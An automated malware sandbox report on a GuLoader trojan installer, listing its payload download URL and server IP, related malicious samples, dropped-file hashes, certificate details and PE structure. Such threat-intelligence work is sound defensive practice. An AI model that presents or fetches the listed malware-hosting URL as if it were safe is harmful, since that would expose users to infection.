      https://alfacen.com/escDKcLKdKFF2.bin0%Avira URL Cloudsafe
      https://alfacen.com/escDKcLKdKFF2.bin=0%Avira URL Cloudsafe
      https://alfacen.com/80%Avira URL Cloudsafe
      https://alfacen.com/escDKcLKdKFF2.bin$0%Avira URL Cloudsafe
      https://alfacen.com/escDKcLKdKFF2.bin.0%Avira URL Cloudsafe
      https://alfacen.com/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      alfacen.com
      193.107.36.30
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://alfacen.com/escDKcLKdKFF2.binfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0GuwV0t2UU.exe, 00000007.00000001.2399745830.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
          high
          http://www.ftp.ftp://ftp.gopher.0GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
            high
            https://alfacen.com/escDKcLKdKFF2.bin$0GuwV0t2UU.exe, 00000007.00000002.3115603087.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0GuwV0t2UU.exe, 00000007.00000001.2399745830.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
              high
              https://alfacen.com/80GuwV0t2UU.exe, 00000007.00000002.3115603087.0000000007523000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorError0GuwV0t2UU.exe, 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 0GuwV0t2UU.exe, 00000000.00000000.1398904537.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                high
                https://alfacen.com/0GuwV0t2UU.exe, 00000007.00000002.3115603087.0000000007523000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://alfacen.com/escDKcLKdKFF2.bin.0GuwV0t2UU.exe, 00000007.00000002.3115603087.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://alfacen.com/escDKcLKdKFF2.bin=0GuwV0t2UU.exe, 00000007.00000003.2777936328.0000000007534000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777753505.0000000007534000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3115865234.0000000007536000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  193.107.36.30
                  alfacen.comBulgaria
                  201200SUPERHOSTING_ASBGfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1549467
                  Start date and time:2024-11-05 17:07:42 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 34s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:0GuwV0t2UU.exe
                  renamed because original name is a hash value
                  Original Sample Name:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff.exe
                  Detection:MAL
                  Classification:mal84.troj.evad.winEXE@3/9@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 90%
                  • Number of executed functions: 56
                  • Number of non-executed functions: 309
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: 0GuwV0t2UU.exe
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.107.36.30450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                    450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                      3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                        3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                            Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                              SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  alfacen.com450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SUPERHOSTING_ASBGRob.Kuster@stonhard.com.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                  • 185.45.66.155
                                  zip file.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                  • 185.45.66.155
                                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37f463bf4616ecd445d4a1937da06e19K22jLJUukr.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  H096Ewc7ki.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 193.107.36.30
                                  T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 193.107.36.30
                                  lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 193.107.36.30
                                  eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  374UU58JVt.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 193.107.36.30
                                  eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 193.107.36.30
                                  kzTEwlPWa0.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\nsaC158.tmp\System.dlleXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                    eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                      NacahSetup.exeGet hashmaliciousUnknownBrowse
                                        NacahSetup.exeGet hashmaliciousUnknownBrowse
                                          PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            Brneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              Brneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                Bestellung.vbsGet hashmaliciousGuLoaderBrowse
                                                  Bestellung_101624.vbsGet hashmaliciousGuLoaderBrowse
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):12288
                                                    Entropy (8bit):5.804946284177748
                                                    Encrypted:false
                                                    SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                    MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                    SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                    SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                    SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: eXaiza8cQ5.exe, Detection: malicious, Browse
                                                    • Filename: eXaiza8cQ5.exe, Detection: malicious, Browse
                                                    • Filename: NacahSetup.exe, Detection: malicious, Browse
                                                    • Filename: NacahSetup.exe, Detection: malicious, Browse
                                                    • Filename: PO-33463334788.exe, Detection: malicious, Browse
                                                    • Filename: Brneforsorgspdagogers.exe, Detection: malicious, Browse
                                                    • Filename: Brneforsorgspdagogers.exe, Detection: malicious, Browse
                                                    • Filename: Bestellung.vbs, Detection: malicious, Browse
                                                    • Filename: Bestellung_101624.vbs, Detection: malicious, Browse
                                                    Reputation:moderate, very likely benign file
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1946975
                                                    Entropy (8bit):2.806117804909863
                                                    Encrypted:false
                                                    SSDEEP:12288:rR9mfmPGpuRRZ8fzb4ylVIXRmOE6gKEiW/aSz:F8cSuxqb4SVmRrg7/aSz
                                                    MD5:5B3BB2247C7ECBB474B9D2DAD6B48F7F
                                                    SHA1:4796B4FB3B381194AD4402FD32B6EA0DBCB90C56
                                                    SHA-256:8AF0A5CC73F2E6AF20549B6B19A0E36BB8237D4F55F21AC9A0BA96DD1B188EFF
                                                    SHA-512:933549DD6B71638B9775C9F536C56BE5F5BEF0E65D94A580DB9D64CF68BC870F51110153445F300E9D3C9B5E34E35BAF35158EEC7A685FB6D3C6262F5A8706F2
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:vJ......,.......,.......\.......`-......DI......FJ...........................................................v..............................................................................................................................................................................G...Z...............h...............................................................g...............................................................j.............................................................................................................................../.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):303518
                                                    Entropy (8bit):7.693063601326674
                                                    Encrypted:false
                                                    SSDEEP:6144:ymfmP8hrVppgNRAGvMptu8fZZ7zbm3IkyZXV1ytd8fkW9ZoE6z:ymfmPGpuRRZ8fzb4ylVIXRmOE6z
                                                    MD5:51581B43F9E295BE259A5A956CF2DA8F
                                                    SHA1:2223CD8EB3D3F4588EBAA556C334B7B31931E5F6
                                                    SHA-256:B5B3ACFB1E514A8EEFDBF28AFB9672B9DBB205A429A215CC70C9762D61DE0A40
                                                    SHA-512:07CCA659E1C9E7A144710FF35388668DA21C0EAE6D876EF3062BF4482D3DD62F710DA6085666B80C3717BAA6FEBA71244D055B17549BB527FF21CCB704B4B779
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:....................,...A... ........Y.. ................j............CCC.P.........~.........==.....k...........8888...........0....wwww.....&............nn.....HHH.{{........~.fff.....p...&...-...jj....................................00.vvv..................v......2......]]].....k..&.....mm.................J.X.........g..o...............i....!....bbb.............................B................G...............V..qq...................;;;.....nnn........../.'..............................................1..Q.=.3............0...........%%%%%.I.....2.111111. .).............................=......k.:...........kk.kk.....C..h......'..............K...................\\\......f........www.c....................................................QQ...z...:............l..............$$$$............5.......aaa.J..\\..SS...FFF..............4444...........@@..NNNN.......:.^..++......................~......>.N...................q.........II........8.............).........................>.......
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):69084
                                                    Entropy (8bit):4.603760453423635
                                                    Encrypted:false
                                                    SSDEEP:1536:7z9lFzNYTn70XJGL4lb6Wl5ExQHzQmlhrBl48V:FDBI70XcGbn5EeHznxoq
                                                    MD5:ACB2833B890437599A3E6A332916AC8D
                                                    SHA1:4D80FEDC90EFDF3F68AD05F71E4DA687084EF8C4
                                                    SHA-256:1F7C38980704550B4E915F4137F30004BBF3EC81BCC61ADB7E88C6D9DE343E45
                                                    SHA-512:6B4BEE3FACED797A01920BE6230244E901E35706FE4274FF1625AEAB1C5DD9D61CDDE173596B2311DCA9344DF0E6B41585E5788CAADDA62E8FB8B1C312F433CF
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...Z...U...{{....................]...b....................................O.[[.mm..............Q......................N.........[[...........(.WW....;.UU.jj............J....................................ttt."......................\..`..........w.........`............P.@....%%...{....ooo.................................................}}}}}}}}.....??...ww...VVVV...........JJ.....................*******........1...............iiiii...........TTT.......7..............___.`.......0................{.......hh...~~....*........................iii......................d.kk.}.OO...............?...j.........qq..CCC..'.......f.ggg...............!!......TTT..7...w........OO.........''.....TT..............cc.}}}.......%..((.....o.............**..b...............tttt........................^.................XXX....................Y...........t.llll.....LL..P........R.FF.=.....$.R.....++.}..............h......}}}}}.....T.::::..v.FF.U.....ss................x.......ggg.................. ........
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):449187
                                                    Entropy (8bit):1.237422861698846
                                                    Encrypted:false
                                                    SSDEEP:1536:eC1rHCXyOIiJOV+okMSfFtaFhH6FSr75qYdB04whG:eC1r5OIiJz/iXH6FSr7IIrwhG
                                                    MD5:CA16C710B6F58865710B74F64D516AC5
                                                    SHA1:E67537C4BC3C64F4085305F81C5595732E36E9CD
                                                    SHA-256:251E742EEC6E46D3FA512EB3CE25A2DDEF371CFF7E5F3596D98F1BBCD028ED6F
                                                    SHA-512:9ED1024823C038B7CF951ECD73779EB492B0D858994848A752F36A7480BB573AA032E3C5684697A0AD89F8DE189460D236A3015805F450D0F5703B84E873AF3A
                                                    Malicious:false
                                                    Preview:...................................................."........../.......................T.....................v........j.......................(...........................................................Q......................................................................................................................................................................Z........................D................................^..........................................................T......................................................}.....m...+.......................................$.............G............b......................@...................................................................y............................B.........................6....................*................!......6.....................................{...................<../..........C.....................................................;......................................................8........
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):465587
                                                    Entropy (8bit):1.258057339820465
                                                    Encrypted:false
                                                    SSDEEP:768:5ey7/lr4xtCx8bJJGSu+O+sKqBXJwdTd7QJTB4+3GIc+u0ehBDl2jkv7qfadwjus:zOrUXKKtq6s5Jj3X1ir
                                                    MD5:F7A3A6A56220B4F010490D77066CC809
                                                    SHA1:658A58A63948A2E3D2DAA133F1A962090C6F56B5
                                                    SHA-256:78052B085ECF2B27FA90AD47EA7DA69AF0FE075FD81FA4F62DEE0324912062FD
                                                    SHA-512:B7AAA9767FB1FDE4948678AF664567126926311ECDA34C3D6C0F01C36DD126FC9233CEFDE6A0CDFC200B716143F4FA333B7F3039BDC145376B1AA67C820DC3BD
                                                    Malicious:false
                                                    Preview:....................".................................A........v.........................................................................G.......................T.......................................................................................................N...........................J..................s......`.................>.......>..........._._.i.....................................................................................................................................4...........................m....................<...............ry....s.........Z...................B.................................^..............$...........................a...........................................q...........................B........................................................5...............................................l.........................@........p.........................................................................................7.......i.........E....
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):464
                                                    Entropy (8bit):4.2785660816531506
                                                    Encrypted:false
                                                    SSDEEP:6:eAbLsAJn+tmAXRbALVWHy5qLCA0Ybl/3WYJUXq19F0zXZ6Zy65YMEAHbzMa3GeQk:UAmCvOD0YdeX8ioZ/THZ2evzBb1
                                                    MD5:0B2D2CB964A22694778B3639FB67E1D0
                                                    SHA1:75EC16F528D750772DA87CF82B89AEAE9651CD2C
                                                    SHA-256:604E104ADEDA28672779957466B71CF51B610BDEA5A1C3D54084CBA0C239ED1C
                                                    SHA-512:1357F9129AA23F546CE5F4F9821C209928D39109E67F273A83914E25F7BA9D10A7A2D0ACD44AE507FCAC9B88780CFAD371508403E95FD56520CBC31AB3793F4E
                                                    Malicious:false
                                                    Preview:unrepentant underdrive unnovel megalopore learchus samletank overbait fluevgteren studio sportsfly..appellabelt centro ttninger forhaabnings nrarucu uddataskemaernes,tyvekronesedlens reproduktioner gevirer mikrofonens anbefalelsesvrdigstes podargidae knapstvlers..arculite riningerne autoriserings pyrotechnician chatelaines percolating.pluripartite biavl physiopathologic recoloration sapful creedalist,windermost fibrocytic vandpest oakenshaw genopfrtes caitiff.
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):355322
                                                    Entropy (8bit):1.248668847963627
                                                    Encrypted:false
                                                    SSDEEP:768:aMrIrJVUmy9wRXGk+LZS+DgA/uaOPNAaT2jd9JE66AUw0oGjg3cSnZSSM/iu8MRt:7wcjuacoqXjg3hgNltIS1vB/E8g
                                                    MD5:F7F3749CDD0D5BADCBB47E3D35654BF1
                                                    SHA1:889CA65BD3EDAFCCDB90C2CA5C72185A6FEC3436
                                                    SHA-256:8CD826E589CDBAB5B02AE83033424D4CC0B0E3DCACAEB207F7D20CA917022564
                                                    SHA-512:5BDA06183A804C9E4172293F48F74745A02533FACF8604542EA39E4C38DBD1A7ACACB1DD1AB158A635C1CD1E0B19698127CA97CCD6AA16D0EEEAEAF22555B1B0
                                                    Malicious:false
                                                    Preview:.................................................................|........................................................A....X.o.......................U...........q......................................(.......................................................|......................................................................._...}.......................................g.................................&..............................................................................7.t....F.........................$...T.............7.............w.........................................................d............................................................................................................}..........N....................!.#.....*.............b............................b..M.....M........S................P...............G................&....h......H..........................}..........i....f.................................e.'..<k...../.s........................
                                                    Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):272420
                                                    Entropy (8bit):1.2471254394709002
                                                    Encrypted:false
                                                    SSDEEP:768:NOeUjZIwSV6Se8pPwkdZ2SxUP4j9DT+IOIJlHzvV1faN65lsDNa7NeOc7LJBasrJ:dC/OZB9JVoRaY4D7J8upv
                                                    MD5:783A67D1245251BF34509DDED7A2CA06
                                                    SHA1:287C1C8C5F2D3B3FA1318BA9791F4E5E07B7BBB2
                                                    SHA-256:CCD706F520EDD8D081FBF244EE365A41D16E9246185574F2C4A1DC3A9F30D423
                                                    SHA-512:C92989CE6A1C1B7A94A44D307B4A002E7B9AAD02CF8DF9FB0385FD4F4695E60DAF026CC8C3D60AAE7868DC39C4276AE373C1AD9A216C3E0606EEF64E45ED5F63
                                                    Malicious:false
                                                    Preview:...........6................................................................e..............j.............................................................V..............................t.................................f.....................>........F...k.............................................r...........:..........................................................P.......a......................Z...................................................Q....................................../..............I..............................."..............._..........#.....<.#.................L............................................................K.........]......................................f....................W..............0......R.........@........................................................................................................3...}...............b..............................................a......................................................(...............
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.6558481961369464
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:0GuwV0t2UU.exe
                                                    File size:695'648 bytes
                                                    MD5:4ea3d3a468f53ca1b57d8c2db7eb3037
                                                    SHA1:cf31eb62d544ebef441f5d2cc2e219d65bd43ad6
                                                    SHA256:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff
                                                    SHA512:5cec7ea3d2dca84434c81510239b7a246a0505a22fd8fa228e84b1b681125f029d3925401e74379ec2888b4074e976e0f4156c8644ace4188350ad5dc93c7679
                                                    SSDEEP:12288:hHadgT2v16lXEF/iUX4g2X2GSNsZNRXcQTnFUJANXhX96kONav45bvriL5:hadgTvEF/N8X6N2bXc+FUWNhX96lNaYO
                                                    TLSH:DAE422069153E4A2C70A027326BBD8C5BEB9AC905DE7270B33C4771EF871AA5372D647
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....
                                                    Icon Hash:e0f0335d4b2a1d03
                                                    Entrypoint:0x403665
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                    Signature Valid:false
                                                    Signature Issuer:CN=Foveolated, O=Foveolated, L=Planques, C=FR
                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 23/10/2023 07:08:06 22/10/2026 07:08:06
                                                    Subject Chain
                                                    • CN=Foveolated, O=Foveolated, L=Planques, C=FR
                                                    Version:3
                                                    Thumbprint MD5:B3D4604C2060C6978097D6AB24477EAD
                                                    Thumbprint SHA-1:664888114D2755CF0E73738AB7F82FDE35B91E70
                                                    Thumbprint SHA-256:17C7E666BBA1B7DB350FD2AF565FE572F65B43C72CC7C8FB5C9437AA4913DC6C
                                                    Serial:3F1543551EB9D1508CF6F4C1F6F718CD5555CA59
                                                    Instruction
                                                    sub esp, 000003F8h
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebp, ebp
                                                    push 00008001h
                                                    mov dword ptr [esp+20h], ebp
                                                    mov dword ptr [esp+18h], 0040A230h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [004080A0h]
                                                    mov esi, dword ptr [004080A4h]
                                                    lea eax, dword ptr [esp+34h]
                                                    push eax
                                                    mov dword ptr [esp+4Ch], ebp
                                                    mov dword ptr [esp+0000014Ch], ebp
                                                    mov dword ptr [esp+00000150h], ebp
                                                    mov dword ptr [esp+38h], 0000011Ch
                                                    call esi
                                                    test eax, eax
                                                    jne 00007FCFED34479Ah
                                                    lea eax, dword ptr [esp+34h]
                                                    mov dword ptr [esp+34h], 00000114h
                                                    push eax
                                                    call esi
                                                    mov ax, word ptr [esp+48h]
                                                    mov ecx, dword ptr [esp+62h]
                                                    sub ax, 00000053h
                                                    add ecx, FFFFFFD0h
                                                    neg ax
                                                    sbb eax, eax
                                                    mov byte ptr [esp+0000014Eh], 00000004h
                                                    not eax
                                                    and eax, ecx
                                                    mov word ptr [esp+00000148h], ax
                                                    cmp dword ptr [esp+38h], 0Ah
                                                    jnc 00007FCFED344768h
                                                    and word ptr [esp+42h], 0000h
                                                    mov eax, dword ptr [esp+40h]
                                                    movzx ecx, byte ptr [esp+3Ch]
                                                    mov dword ptr [00429B18h], eax
                                                    xor eax, eax
                                                    mov ah, byte ptr [esp+38h]
                                                    movzx eax, ax
                                                    or eax, ecx
                                                    xor ecx, ecx
                                                    mov ch, byte ptr [esp+00000148h]
                                                    movzx ecx, cx
                                                    shl eax, 10h
                                                    or eax, ecx
                                                    movzx ecx, byte ptr [esp+0000004Eh]
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x15c78.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xa7a980x22c8
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x66d70x68004e97e586f167bf2d2eddcdba22e25c0eFalse0.6615835336538461data6.441769857560007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x1fb780x600e411b225ac3cd03a5dad8143ae82958dFalse0.5091145833333334data4.122928093833695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x2a0000x370000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x610000x15c780x15e007636c8e4ac23a636cec56c6e37b6ad74False0.27889508928571427data3.292626744838751IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_BITMAP0x613280x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                    RT_ICON0x616900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25977463622382585
                                                    RT_ICON0x71eb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3216804979253112
                                                    RT_ICON0x744600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.349437148217636
                                                    RT_ICON0x755080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3959016393442623
                                                    RT_ICON0x75e900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4370567375886525
                                                    RT_DIALOG0x762f80x144dataEnglishUnited States0.5216049382716049
                                                    RT_DIALOG0x764400x13cdataEnglishUnited States0.5506329113924051
